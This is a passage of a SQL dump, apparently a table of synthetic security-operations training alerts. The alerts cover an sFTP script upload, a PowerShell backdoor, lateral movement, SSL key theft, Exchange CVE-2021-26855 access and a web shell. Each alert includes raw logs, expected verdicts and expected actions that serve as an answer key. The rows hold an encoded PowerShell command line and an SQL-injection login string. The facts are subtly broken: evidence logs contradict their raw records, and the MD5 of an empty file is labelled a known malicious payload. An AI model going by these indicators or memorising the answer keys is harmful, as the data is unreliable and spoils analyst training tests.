Log\\\",\\\"event_description\\\":\\\"An account failed to log on.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.753Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:42:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"logon_type\\\":\\\"3\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"target_domain\\\":\\\"corp.godaddy.com\\\",\\\"status\\\":\\\"Failed\\\",\\\"failure_reason\\\":\\\"Account currently disabled\\\",\\\"internal_ip\\\":\\\"10.10.15.23\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"event_description\\\":\\\"An account failed to log 
on.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.753Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:42:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"logon_type\\\":\\\"3\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"target_domain\\\":\\\"corp.godaddy.com\\\",\\\"status\\\":\\\"Failed\\\",\\\"failure_reason\\\":\\\"Account currently disabled\\\",\\\"internal_ip\\\":\\\"10.10.15.23\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"event_description\\\":\\\"An account failed to log on.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.753Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:42:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"logon_type\\\":\\\"3\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"target_domain\\\":\\\"corp.godaddy.com\\\",\\\"status\\\":\\\"Failed\\\",\\\"failure_reason\\\":\\\"Account currently disabled\\\",\\\"internal_ip\\\":\\\"10.10.15.23\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"event_description\\\":\\\"An account failed to log on.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1055, 'Suspicious sFTP Activity', 'medium', 'sFTP server logs', 'An attacker has uploaded a malicious script to a WordPress site via sFTP. The script is intended to exploit known vulnerabilities in WordPress installations.', 'Execution', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"sftp_server\":\"sftp.example.com\",\"action\":\"upload\",\"username\":\"compromised_user\",\"client_ip\":\"203.0.113.45\",\"server_ip\":\"192.168.1.10\",\"file_uploaded\":\"malicious_script.php\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"transfer_status\":\"completed\"}', '2026-01-24 00:38:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User account used in suspicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_script.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"malicious\",\"details\":\"File identified as a malicious script targeting WordPress.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware associated with WordPress exploits.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'SIEM', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.755Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"sftp_server\\\":\\\"sftp.example.com\\\",\\\"action\\\":\\\"upload\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"server_ip\\\":\\\"192.168.1.10\\\",\\\"file_uploaded\\\":\\\"malicious_script.php\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"transfer_status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.755Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"sftp_server\\\":\\\"sftp.example.com\\\",\\\"action\\\":\\\"upload\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"server_ip\\\":\\\"192.168.1.10\\\",\\\"file_uploaded\\\":\\\"malicious_script.php\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"transfer_status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.755Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"sftp_server\\\":\\\"sftp.example.com\\\",\\\"action\\\":\\\"upload\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"server_ip\\\":\\\"192.168.1.10\\\",\\\"file_uploaded\\\":\\\"malicious_script.php\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"transfer_status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.755Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"sftp_server\\\":\\\"sftp.example.com\\\",\\\"action\\\":\\\"upload\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"server_ip\\\":\\\"192.168.1.10\\\",\\\"file_uploaded\\\":\\\"malicious_script.php\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"transfer_status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.755Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"sftp_server\\\":\\\"sftp.example.com\\\",\\\"action\\\":\\\"upload\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"server_ip\\\":\\\"192.168.1.10\\\",\\\"file_uploaded\\\":\\\"malicious_script.php\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"transfer_status\\\":\\\"completed\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1056, 'Persistent Backdoor Established', 'high', 'Endpoint detection and response (EDR) logs', 'An attacker has installed a persistent backdoor on the compromised system to maintain access. This action is part of a broader campaign to ensure continued access even if initial infections are detected and removed.', 'Persistence', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"hostname\":\"compromised-host\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"203.0.113.45\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -encodedCommand aW1wb3J0LW1vZHVsZSBuZXQuc2VydmljZXM7IFN0YXJ0LVByb2Nlc3MgJ3NjcmlwdC5leGUn\",\"username\":\"compromised_user\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Roaming\\\\backdoor.exe\"}', '2026-01-24 00:38:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with backdoor malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Threat Database\",\"verdict\":\"malicious\",\"details\":\"Backdoor used for persistent access.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Compromised user account used to execute the 
backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1057, 'Lateral Movement Detected in Network', 'high', 'Network traffic analysis', 'Using the established backdoor, the attacker moves laterally to other systems, targeting more WordPress accounts.', 'Lateral Movement', 'T1071.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.12\",\"user\":\"wp_admin\",\"malware_hash\":\"4d2c6b6ba54ede6b9d5c1d1f1e5b8c7c\",\"filename\":\"wp_backdoor.php\",\"event_type\":\"network_connection\",\"protocol\":\"TCP\",\"destination_port\":22,\"action\":\"connection_attempt\",\"status\":\"success\"}', '2026-01-24 00:38:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known command and control server IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server targeted for lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"4d2c6b6ba54ede6b9d5c1d1f1e5b8c7c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with known PHP web shell\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"wp_backdoor.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Custom PHP script for unauthorized access\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1058, 'SSL Private Key Theft Alert', 'high', 'Data loss prevention (DLP) systems', 'The DLP system detected the unauthorized exfiltration of SSL private keys and other sensitive data. This is a critical step in the attacker\'s operation to exfiltrate sensitive data for future malicious activities or sale on the dark web.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T14:32:00Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"192.168.1.24\",\"destination_ip\":\"203.0.113.45\",\"username\":\"john.doe\",\"action\":\"exfiltration\",\"sensitive_files\":[{\"filename\":\"ssl_private_key.pem\",\"hash\":\"d2f6e0b5e8a3c1f1d9f2c9b8e4a7f5d2\"},{\"filename\":\"confidential_data.zip\",\"hash\":\"b9d3f8e6c7a1b0c4e3d5f9e8b1a7c3d9\"}],\"exfiltration_method\":\"encrypted_channel\",\"alert_triggered\":true}', '2026-01-24 00:38:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.24\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network_scan\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known C2 server used for data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d2f6e0b5e8a3c1f1d9f2c9b8e4a7f5d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation\",\"verdict\":\"suspicious\",\"details\":\"Hash of the exfiltrated SSL private key file.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b9d3f8e6c7a1b0c4e3d5f9e8b1a7c3d9\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation\",\"verdict\":\"suspicious\",\"details\":\"Hash of the exfiltrated confidential data 
archive.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ssl_private_key.pem\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation\",\"verdict\":\"suspicious\",\"details\":\"Name of the exfiltrated SSL private key file.\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation\",\"verdict\":\"suspicious\",\"details\":\"Name of the exfiltrated confidential data archive.\"}},{\"id\":\"artifact_7\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_database\",\"verdict\":\"internal\",\"details\":\"Internal user account involved in the incident.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.757Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.24\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"john.doe\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"sensitive_files\\\":[{\\\"filename\\\":\\\"ssl_private_key.pem\\\",\\\"hash\\\":\\\"d2f6e0b5e8a3c1f1d9f2c9b8e4a7f5d2\\\"},{\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"b9d3f8e6c7a1b0c4e3d5f9e8b1a7c3d9\\\"}],\\\"exfiltration_method\\\":\\\"encrypted_channel\\\",\\\"alert_triggered\\\":true}\"},{\"timestamp\":\"2026-02-01T20:31:22.757Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected 
[Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.24\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"john.doe\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"sensitive_files\\\":[{\\\"filename\\\":\\\"ssl_private_key.pem\\\",\\\"hash\\\":\\\"d2f6e0b5e8a3c1f1d9f2c9b8e4a7f5d2\\\"},{\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"b9d3f8e6c7a1b0c4e3d5f9e8b1a7c3d9\\\"}],\\\"exfiltration_method\\\":\\\"encrypted_channel\\\",\\\"alert_triggered\\\":true}\"},{\"timestamp\":\"2026-02-01T20:30:22.757Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.24\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"john.doe\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"sensitive_files\\\":[{\\\"filename\\\":\\\"ssl_private_key.pem\\\",\\\"hash\\\":\\\"d2f6e0b5e8a3c1f1d9f2c9b8e4a7f5d2\\\"},{\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"b9d3f8e6c7a1b0c4e3d5f9e8b1a7c3d9\\\"}],\\\"exfiltration_method\\\":\\\"encrypted_channel\\\",\\\"alert_triggered\\\":true}\"},{\"timestamp\":\"2026-02-01T20:29:22.757Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.24\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"john.doe\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"sensitive_files\\\":[{\\\"filename\\\":\\\"ssl_private_key.pem\\\",\\\"hash\\\":\\\"d2f6e0b5e8a3c1f1d9f2c9b8e4a7f5d2\\\"},{\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"b9d3f8e6c7a1b0c4e3d5f9e8b1a7c3d9\\\"}],\\\"exfiltration_method\\\":\\\"encrypted_channel\\\",\\\"alert_triggered\\\":true}\"},{\"timestamp\":\"2026-02-01T20:28:22.757Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.24\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"john.doe\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"sensitive_files\\\":[{\\\"filename\\\":\\\"ssl_private_key.pem\\\",\\\"hash\\\":\\\"d2f6e0b5e8a3c1f1d9f2c9b8e4a7f5d2\\\"},{\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"b9d3f8e6c7a1b0c4e3d5f9e8b1a7c3d9\\\"}],\\\"exfiltration_method\\\":\\\"encrypted_channel\\\",\\\"alert_triggered\\\":true}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1059, 'Suspicious Access via CVE-2021-26855', 'high', 'Network traffic logs', 'An unauthorized access attempt was detected on the Exchange server. The attacker exploited CVE-2021-26855, an SSRF vulnerability, to impersonate the Exchange server and bypass authentication.', 'Initial Access', 'T1190', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:23:55Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"destination_port\":443,\"exploit\":\"CVE-2021-26855\",\"username\":\"exchange_admin\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\",\"http_method\":\"POST\",\"request_uri\":\"/owa/auth/x.js\",\"response_code\":200,\"malicious_payload_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-24 03:32:45', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal Exchange server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"exchange_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Anomalous activity detected using this username.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1060, 'Web Shell Deployment Detected', 'high', 'Web server logs', 'A web shell has been detected on the server, indicating the attacker has deployed it to maintain persistent access and execute remote commands. The web shell was uploaded to the server following initial access.', 'Persistence', 'T1505.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:34Z\",\"web_server\":\"Apache/2.4.41 (Ubuntu)\",\"client_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"http_request\":\"POST /uploads/suspicious.php HTTP/1.1\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\",\"filename\":\"suspicious.php\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"webadmin\",\"status_code\":200,\"response_size\":345}', '2026-01-24 03:32:45', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple web shell attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server IP\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"suspicious.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Common web shell filename used by attackers\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash matches known web shell\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"webadmin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Users\",\"verdict\":\"clean\",\"details\":\"Authorized user but 
potentially compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'novice', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.759Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:34Z\\\",\\\"web_server\\\":\\\"Apache/2.4.41 (Ubuntu)\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"http_request\\\":\\\"POST /uploads/suspicious.php HTTP/1.1\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\",\\\"filename\\\":\\\"suspicious.php\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"webadmin\\\",\\\"status_code\\\":200,\\\"response_size\\\":345}\"},{\"timestamp\":\"2026-02-01T20:31:22.759Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:34Z\\\",\\\"web_server\\\":\\\"Apache/2.4.41 (Ubuntu)\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"http_request\\\":\\\"POST /uploads/suspicious.php HTTP/1.1\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 
